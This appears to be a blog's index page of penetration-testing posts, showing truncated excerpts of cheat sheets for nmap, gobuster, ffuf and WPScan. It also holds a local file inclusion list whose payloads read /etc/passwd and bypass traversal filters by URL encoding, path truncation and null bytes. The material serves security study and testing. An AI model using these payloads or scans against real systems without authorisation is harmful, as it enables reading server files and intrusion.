Posted in WebPentest
Posted in PenTest
PenTest 101 – Cheat Sheet
Command | Description
sudo nano /etc/hosts | Opens /etc/hosts with nano to start adding hostnames
sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_list | Runs an nmap scan using common web application ports based on a scope list (scope_list) and outputs to a file (web_discovery)…
Posted in Enumeration, WebPentest
Gobuster Cheat Sheet
Common Gobuster Commands
dir Mode
gobuster dir -u https://nlabs.local -w ~/wordlists/shortlist.txt
With content length
gobuster dir -u https://nlabs.local -w ~/wordlists/shortlist.txt -l
dns Mode
gobuster dns -d nlabs.local -t 50 -w common-names.txt
gobuster dns -d nlabs.local -w…
Posted in WebPentest, Web Enumeration
Complete Guide on ffuf
In web application penetration testing, entry points are areas of an application where a user can input data or interact with the system, which an attacker could potentially exploit. Identifying these points is crucial because they…
Posted in Enumeration, WebPentest
Ffuf – Cheat Sheet
Ffuf commands
Command | Description
ffuf -h | ffuf help
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ | Directory Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ | Extension Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php | Page Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v | Recursive Fuzzing
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.nlabs.local/ | Sub-domain Fuzzing
ffuf…
Posted in WebPentest
File Inclusion – Cheat Sheet
Local File Inclusion
Command | Description
Basic LFI
/index.php?language=/etc/passwd | Basic LFI
/index.php?language=../../../../etc/passwd | LFI with path traversal
/index.php?language=/../../../etc/passwd | LFI with name prefix
/index.php?language=./languages/../../../../etc/passwd | LFI with approved path
LFI Bypasses
/index.php?language=....//....//....//....//etc/passwd | Bypass basic path traversal filter
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 | Bypass filters with URL encoding
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times] | Bypass appended extension with path truncation (obsolete)
/index.php?language=../../../../etc/passwd%00 | Bypass appended extension with…
Posted in WebPentest
Web Vulnerabilities – File Inclusion
Path Traversal
Also known as directory traversal, this web security vulnerability allows an attacker to read operating system resources, such as local files on the server running an application. The attacker exploits this vulnerability by manipulating and…
Posted in Enumeration, WebPentest
Enumerating WordPress with WPScan
WPScan capabilities
The version of WordPress installed and any associated vulnerabilities
What plugins are installed and any associated vulnerabilities
What themes are installed and any associated vulnerabilities
Username enumeration
Users with weak passwords via password brute…
Posted in Enumeration
Nmap
Nmap scan - port states
Port State | Description
Open | Indicates that an application on the target system is actively accepting connections (TCP/UDP/SCTP) on that port.
Closed | Indicates there isn't any application listening on that port.
Filtered | Nmap cannot determine the port status…




